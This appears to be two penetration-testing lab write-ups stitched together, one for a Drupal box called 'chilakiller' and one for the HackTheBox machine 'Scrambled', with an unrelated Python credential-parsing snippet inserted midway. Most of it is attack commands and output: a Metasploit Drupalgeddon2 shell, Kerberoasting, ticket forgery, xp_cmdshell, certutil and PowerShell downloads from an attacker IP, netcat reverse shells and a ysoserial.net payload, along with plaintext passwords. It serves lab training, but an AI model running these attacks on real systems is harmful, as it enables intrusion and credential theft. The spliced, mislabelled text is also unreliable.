ptd-chilakiller
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat ports.nmap
# Nmap 7.92 scan initiated Mon Aug 29 10:17:40 2022 as: nmap -sC -sV -oN ports.nmap 10.150.150.182
Nmap scan report for 10.150.150.182
Host is up (0.086s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
|   2048 8e:0a:83:30:6b:a5:ef:12:81:4a:8e:66:c6:f4:22:12 (RSA)
|   256 ef:77:5e:a9:59:19:de:f8:c3:f3:1c:2e:73:09:8a:8f (ECDSA)
|_  256 b3:be:3b:05:0c:f7:62:24:ce:1b:5c:5b:df:cc:fc:23 (ED25519)
80/tcp   open  http       nginx 1.4.0 (Ubuntu)
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Date: Mon, 29 Aug 2022 09:00:40 GMT
|     Server: nginx 1.4.0 (Ubuntu)
|     Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT
|     ETag: "264-5abd7039b3849"
|     Accept-Ranges: bytes
|     Content-Length: 612
|     Vary: Accept-Encoding
|     Connection: close
|     Content-Type: text/html
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>Welcome to nginx!</title>
|     <style>
|     body {
|     width: 35em;
|     margin: 0 auto;
|     font-family: Tahoma, Verdana, Arial, sans-serif;
|     </style>
|     </head>
|     <body>
|     <h1>Welcome to nginx!</h1>
|     <p>If you see this page, the nginx web server is successfully installed and
|     working. Further configuration is required.</p>
|     <p>For online documentation and support please refer to
|     href="http://nginx.org/">nginx.org</a>.<br/>
|     Commercial support is available at
|     href="http://nginx.com/">nginx.com</a>.</p>
|     <p><em>Thank you for using nginx.</em></p>
|     </body>
|     </html>
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Mon, 29 Aug 2022 09:00:40 GMT
|     Server: nginx 1.4.0 (Ubuntu)
|     Allow: OPTIONS,HEAD,HEAD,GET,HEAD,POST
|     Content-Length: 0
|     Connection: close
|     Content-Type: text/html
|   RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Date: Mon, 29 Aug 2022 09:00:40 GMT
|     Server: nginx 1.4.0 (Ubuntu)
|     Content-Length: 299
|     Connection: close
|     Content-Type: text/html; charset=iso-8859-1
|     <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|     <html><head>
|     <title>400 Bad Request</title>
|     </head><body>
|     <h1>Bad Request</h1>
|     <p>Your browser sent a request that this server could not understand.<br />
|     </p>
|     <hr>
|     <address>nginx 1.4.0 (Ubuntu) Server at 127.0.1.1 Port 80</address>
|_    </body></html>
|_http-title: Welcome to nginx!
|_http-server-header: nginx 1.4.0 (Ubuntu)
8080/tcp open  http-proxy nginx 1.4.0 (Ubuntu)
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Date: Mon, 29 Aug 2022 09:00:40 GMT
|     Server: nginx 1.4.0 (Ubuntu)
|     Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT
|     ETag: "264-5abd7039b3849"
|     Accept-Ranges: bytes
|     Content-Length: 612
|     Vary: Accept-Encoding
|     Connection: close
|     Content-Type: text/html
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>Welcome to nginx!</title>
|     <style>
|     body {
|     width: 35em;
|     margin: 0 auto;
|     font-family: Tahoma, Verdana, Arial, sans-serif;
|     </style>
|     </head>
|     <body>
|     <h1>Welcome to nginx!</h1>
|     <p>If you see this page, the nginx web server is successfully installed and
|--snipp--
SF:\x2080</address>\n</body></html>\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 29 10:19:25 2022 -- 1 IP address (1 host up) scanned in 105.42 seconds
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat notes.txt
chilakiller
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set T
set TARGET set TARGETURI set TIMESTAMPOUTPUT
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set TARGETURI /restaurante
TARGETURI => /restaurante
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> run
[*] Started reverse TCP handler on 10.66.67.22:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 10.150.150.182
[*] Meterpreter session 1 opened (10.66.67.22:4444 -> 10.150.150.182:32828) at 2022-08-29 12:16:38 +0200
ls
ls
(Meterpreter 1)(/var/www/html/restaurante) >
cat freegift.html
<html>
<head>
<title>Redeem your free gift</title>
</head>
<body>
<!-- FLAG4=3bbff3b43813668741aa213b2cd0cff29c0c7542 -->
</body>
</html>
www-data@chilakiller:/var/www/html/restaurante/sites/default$ cat settings.php | grep password
* 'password' => 'password',
* username, password, host, and database name.
* 'password' => 'password',
* 'password' => 'password',
* 'password' => 'password',
* 'password' => 'password',
'password' => 'EstaContraNoesTanImp0rtant3!!!',
* by using the username and password variables. The proxy_user_agent variable
# $conf['proxy_password'] = '';
www-data@chilakiller:/var/www/html/restaurante/sites/default$
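The grep above returns five commented-out 'password' => 'password' examples from Drupal's documentation block before the one live credential. The following added example (mine, not from the write-up) shows a comment-aware extractor for auditing settings.php files for plaintext database credentials; the settings excerpt is constructed and the password value is a placeholder.

```python
import re

# Constructed excerpt modelled on a Drupal 7 sites/default/settings.php: the
# documentation comment repeats 'password' => 'password', the live $databases
# array holds the real credential, and a trailing '#' comment mentions a proxy
# password. Only the live array should be reported.
SETTINGS_PHP = """\
/**
 * Database settings:
 * @code
 * $databases['default']['default'] = array(
 *   'username' => 'username',
 *   'password' => 'password',
 * );
 * @endcode
 */
$databases = array (
  'default' => array (
    'default' => array (
      'database' => 'drupaldb',
      'username' => 'drupal',
      'password' => 'DB_PASSWORD_PLACEHOLDER',  # placeholder, not a real secret
      'host' => 'localhost',
    ),
  ),
);
# $conf['proxy_password'] = '';
"""

def naive_grep(src: str, needle: str) -> int:
    """What 'grep password' does: counts every line containing the needle."""
    return sum(needle in line for line in src.splitlines())

def strip_php_comments(src: str) -> str:
    """Drop /* ... */ blocks and '//' or '#' line comments, skipping those inside string literals."""
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.S)
    out = []
    for line in src.splitlines():
        quote, i, cut = None, 0, len(line)
        while i < len(line):
            ch = line[i]
            if quote:
                if ch == "\\":
                    i += 1          # skip the escaped character
                elif ch == quote:
                    quote = None
            elif ch in "'\"":
                quote = ch
            elif ch == "#" or line.startswith("//", i):
                cut = i
                break
            i += 1
        out.append(line[:cut])
    return "\n".join(out)

CRED_RE = re.compile(r"'(database|username|password|host)'\s*=>\s*'((?:[^'\\]|\\.)*)'")

def live_credentials(src: str) -> dict:
    """Return only key/value pairs that survive comment stripping, i.e. the active config."""
    return dict(CRED_RE.findall(strip_php_comments(src)))

def is_weak(creds: dict) -> bool:
    """Flag empty, default, or username-equals-password database credentials."""
    pw = creds.get("password", "")
    return pw in ("", "password") or pw == creds.get("username")
```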
www-data@chilakiller:/var/www/html/restaurante/sites/default$ mysql -u drupal -p
Enter password: EstaContraNoesTanImp0rtant3!!!
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 43
Server version: 10.1.45-MariaDB-0+deb9u1 Debian 9.12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
MariaDB [drupaldb]> select * from ptd_users;
select * from ptd_users;
+-----+---------------+---------------------------------------------------------+-----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-----------------------+------+
| uid | name          | pass                                                    | mail                  | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init                  | data |
+-----+---------------+---------------------------------------------------------+-----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-----------------------+------+
|   0 |               |                                                         |                       |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                       | NULL |
|   1 | administrador | $S$Dobcr9v53WJdz6GsuhauWnwKNTm1pZpId6/rNl6psZwj2prE3d9V | chilakiller@ptd.local |       |           | NULL             | 1596317328 | 1643552710 | 1643551677 |      1 | America/Mexico_City |          |       0 | chilakiller@ptd.local | b:0; |
+-----+---------------+---------------------------------------------------------+-----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-----------------------+------+
2 rows in set (0.00 sec)
MariaDB [drupaldb]>
www-data@chilakiller:/var/www/html/restaurante/sites/default$ su user1
su user1
Password: user1
user1@chilakiller:/var/www/html/restaurante/sites/default$ cd /home/user1
cd /home/user1
user1@chilakiller:~$ ls
ls
Desktop Documents FLAG3.txt
user1@chilakiller:~$ cat FLAG3.txt
cat FLAG3.txt
9a8cda5f343e89e68aaec65f1df3c61ae5176a19
user1@chilakiller:~$
user1@chilakiller:/etc/openvpn/client/.config$ cat .5OBdDQ80Py
cat .5OBdDQ80Py
hUqJ2
ChilaKill3s_Tru3_L0v3R
user1@chilakiller:/etc/openvpn/client/.config$
su root
pw = ChilaKill3s_Tru3_L0v3R
root@chilakiller:~# cat FLAG2.txt
cat FLAG2.txt
ccc61a1d18a937cc3db531a5216a04a805d54762
root@chilakiller:/var/www/html/restaurante# find / -name "FLAG1.txt"
find / -name "FLAG1.txt"
find: ‘/run/user/1000/gvfs’: Permission denied
find: ‘/proc/4683/task/4683/net’: Invalid argument
find: ‘/proc/4683/net’: Invalid argument
/var/www/html/test-site/test-2/FLAG1.txt
root@chilakiller:/var/www/html/restaurante# cat /var/www/html/test-site/test-2/FLAG1.txt
ed93e58c308d60f49e97e559ab557b86add97f44
root@chilakiller:/var/www/html/restaurante#
root@chilakiller:/var/www/html/restaurante# hostnamectl
hostnamectl
   Static hostname: chilakiller
         Icon name: computer-vm
           Chassis: vm
        Machine ID: c8677bebac964d43bed5ebe1af1caaa6
           Boot ID: 907f69a447f04a8782bde75417cec04a
    Virtualization: vmware
  Operating System: Debian GNU/Linux 9 (stretch)
            Kernel: Linux 4.9.0-13-amd64
      Architecture: x86-64
root@chilakiller:/var/www/html/restaurante#
Author : Puckiestyle
htb-scrambled-nl
Scrambled
Scanning
> TARGET=10.10.11.168 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Scramble Corp Intranet
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-06-15 23:15:44Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
4411/tcp open found? syn-ack ttl 127
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
| SCRAMBLECORP_ORDERS_V1.0.3;
| FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions:
| SCRAMBLECORP_ORDERS_V1.0.3;
|_ ERROR_UNKNOWN_COMMAND;
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49552/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49692/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49696/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
There are many open ports; this looks like an Active Directory target with LDAP and Kerberos enabled, so enumeration is needed at several interesting places.
Found several domain names that might be useful later.
scrm.local
DC1.scrm.local
scramblecorp.com
Web Enum
Web enum found something interesting: http://scrm.local/support.html
04/09/2021: Due to the security breach last month we have now disabled all NTLM authentication on our network. This may cause problems for some of the programs you use so please be patient while we work to resolve any issues
On http://scrm.local/supportrequest.html, a username is visible in the screenshot: ksimpson.

http://scrm.local/salesorders.html describes a client application used by this organisation. Later we will find the matching server running on port 4411.
If you are experiencing a problem with the sales orders app, please enable debug logging and reproduce the problem. You can enable debug logging by doing the following:
A log file named ScrambleDebugLog will have been created in the same folder you launched the sales app from. Send this file to us via email along with a description of the problem
Directory enumeration didn't find anything useful.
> dirsearch -u http://scrm.local/ -x 403,401,500,400 -f
[19:48:54] Starting:
[19:50:00] 301 - 148B - /assets -> http://scrm.local/assets/
[19:50:40] 301 - 148B - /images -> http://scrm.local/images/
[19:50:41] 200 - 2KB - /index.html
[19:51:07] 200 - 2KB - /passwords.html
[19:51:41] 200 - 2KB - /support.html
Further page enumeration didn't find anything interesting.
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scrm.local/FUZZ.html"
Subdomain enumeration didn't find anything useful either.
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scrm.local/" -H "Host: FUZZ.scrm.local"
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scramblecorp.com/" -H "Host: FUZZ.scramblecorp.com"
So this target probably does not hinge on a web vector.
Host Enum
Host enumeration didn't find anything useful.
> enum4linux 10.10.11.168
Port 4411 Enum
Using nc to connect to the non-standard port 4411 shows a server application running there, but it does not tell us which application it is.
> nc -vn 10.10.11.168 4411

LDAP Enum
Perform LDAP enumeration using a simple Python module (ldap3):
Python 3.10.4 (main, Mar 24 2022, 13:07:27) [GCC 11.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import ldap3
>>> server = ldap3.Server('10.10.11.168', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
>>> server.info
DSA info (from DSE):
Supported LDAP versions: 3, 2
Naming contexts:
DC=scrm,DC=local
CN=Configuration,DC=scrm,DC=local
CN=Schema,CN=Configuration,DC=scrm,DC=local
DC=DomainDnsZones,DC=scrm,DC=local
DC=ForestDnsZones,DC=scrm,DC=local
An nmap scan with the LDAP scripts confirms the results above.
> nmap -n -sV --script "ldap* and not brute" 10.10.11.168
Overall, nothing useful at this stage
Kerberos Enum
Perform username enumeration:
> kerbrute userenum -d scrm.local --dc 10.10.11.168 /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt
2022/06/15 20:03:16 > [+] VALID USERNAME: administrator@scrm.local
2022/06/15 20:04:30 > [+] VALID USERNAME: asmith@scrm.local
2022/06/15 20:06:16 > [+] VALID USERNAME: Administrator@scrm.local
2022/06/15 20:07:39 > [+] VALID USERNAME: jhall@scrm.local
2022/06/15 20:16:59 > [+] VALID USERNAME: sjenkins@scrm.local
2022/06/15 20:18:19 > [+] VALID USERNAME: khicks@scrm.local
2022/06/15 20:30:25 > [+] VALID USERNAME: Asmith@scrm.local
2022/06/15 20:48:39 > [+] VALID USERNAME: ASMITH@scrm.local
We also know from the earlier screenshot that there is probably a user called ksimpson. We can confirm this, and this user happens to use a password that is the same as the username.
> kerbrute bruteuser -d scrm.local --dc 10.10.11.168 pass.txt ksimpson

This user can be used to obtain a TGT with getTGT.py. Note: you may encounter an error when running the getTGT.py script; fix the script according to https://github.com/SecureAuthCorp/impacket/issues/1206
> getTGT.py scrm.local/ksimpson:ksimpson -dc-ip 10.10.11.168
> export KRB5CCNAME=ksimpson.ccache
> impacket-GetUserSPNs scrm.local/ksimpson -k -dc-ip dc1.scrm.local -no-pass -request

Save the ticket to a file mssql.kirbi and crack it using john:
> john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt mssql.kirbi
The credential for sqlsvc is cracked.

We now have a service principal credential, sqlsvc:Pegasus60
Foothold
Via golden ticket impersonation, we can gain a foothold as the service principal; for background refer to: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket
To do so, we need the NTLM hash of a valid account password and the domain SID.
Get the domain SID using windapsearch; set up go-windapsearch from https://github.com/ropnop/windapsearch
> ./windapsearch -d 10.10.11.168 -u sqlsvc@scrm.local -p 'Pegasus60' --secure -j -m computers --full

Generate the NTLM hash for the password `Pegasus60` using https://codebeautify.org/ntlm-hash-generator; this gives b999a16500b87d17ec7f2e2a68778f05
Impersonate Administrator; its user id (RID) is 500 by convention. Read about how Microsoft manages well-known RIDs for more background.
> ticketer.py -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -nthash b999a16500b87d17ec7f2e2a68778f05 -user-id 500 Administrator -spn MSSQLSVC/dc1.scrm.local
> export KRB5CCNAME=Administrator.ccache
Connect to MSSQL using the forged ticket:
> mssqlclient.py dc1.scrm.local -k

Enable xp_cmdshell:
> enable_xp_cmdshell
> xp_cmdshell("whoami")

Upload nc.exe and create a reverse shell; first we need to locate a folder the current account can write to.
> xp_cmdshell certutil.exe -urlcache -f http://10.10.16.3/nc.exe ..\..\Temp\nc.exe
> xp_cmdshell ..\..\Temp\nc.exe 10.10.16.3 4444 -e cmd.exe


Upload SharpHound.exe (I used this version: /usr/lib/bloodhound/resources/app/Collectors/DebugBuilds/SharpHound.exe), run it, and transfer the results back to Kali for analysis.
> certutil.exe -urlcache -f http://10.10.16.3/sh.exe sh.exe

From the BloodHound analysis, there is a user tstar in the IT group which has the CanPSRemote right. However, after some trial and error this proved to be useless.
PE
Upload winPEAS:
> certutil.exe -urlcache -f http://10.10.16.3/p.exe p.exe
# found something interesting from winPEAS
ScrmOrders(Scramble Sales Orders Server)[C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe 4411] - Auto - Running - No quotes and Space detected
[+] Network Shares
ADMIN$ (Path: C:\Windows)
C$ (Path: C:\)
HR (Path: C:\Shares\HR) -- Permissions: AllAccess
IPC$ (Path: )
IT (Path: C:\Shares\IT) -- Permissions: AllAccess
NETLOGON (Path: C:\Windows\SYSVOL\sysvol\scrm.local\SCRIPTS)
Public (Path: C:\Shares\Public) -- Permissions: AllAccess
Sales (Path: C:\Shares\Sales) -- Permissions: AllAccess
SYSVOL (Path: C:\Windows\SYSVOL\sysvol)
There is a PDF document in C:\Shares\Public which says HR has a database; it may contain user passwords.
Check the database for user passwords:
> sqlcmd -q "select name from sys.databases"

Check the tables in ScrambleHR:
> sqlcmd -q "use ScrambleHR;select table_name from information_schema.tables"
# found
Employees
UserImport
Timesheets
Checking the content of UserImport reveals the user MiscSvc with an LDAP credential:
> sqlcmd -q "use ScrambleHR;select db_name();select * from UserImport;"

MiscSvc is an IT user, which means it has the CanPSRemote permission, but evil-winrm doesn't work.

Alternatively, use a PowerShell reverse shell to log in:
> $SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force
> $Cred = New-Object System.Management.Automation.PSCredential('scrm.local\MiscSvc', $SecPassword)
> Invoke-Command -Computer dc1 -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.16.3/shell.ps1') } -Credential $Cred
# on kali
> rlwrap netcat -lvnp 6666
Receive the reverse shell as miscsvc and catch the user flag.

From the previous enumeration, there is a server app running at C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe
Checking which user runs the process returns N/A, so the process is probably run by an account with higher privileges.
> tasklist /v
However, we can access c:\shares\it, which holds a copy of the Sales Orders client application and a DLL file.

* Copy these two files to c:\temp
> nc.exe 10.10.16.3 7777 < ScrambleLib.dll
> nc.exe 10.10.16.3 7777 < ScrambleClient.exe
* On kali
> nc -vnlp 7777 > ScrambleLib.dll
> nc -vnlp 7777 > ScrambleClient.exe
Reverse Eng
We can find some strings that look like operation codes with strings:
> strings ScrambleLib.dll

Set up ILSpy and decompile the DLL, https://github.com/icsharpcode/ILSpy
> /root/.dotnet/tools/ilspycmd -p -o decompile ScrambleLib.dll
Read the decompiled code to understand how the commands work. The payloads are .NET serialised.


Use ysoserial.net to exploit the .NET deserialisation vulnerability; this needs to run on Windows, https://github.com/pwntester/ysoserial.net
> ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "powershell.exe Invoke-Command -Computer dc1 -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.16.3/shell.ps1') }"

Run an nc listener and upload the payload:
> nc 10.10.16.3 4411
> UPLOAD_ORDER;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
Get the reverse shell and catch the root flag.

rooted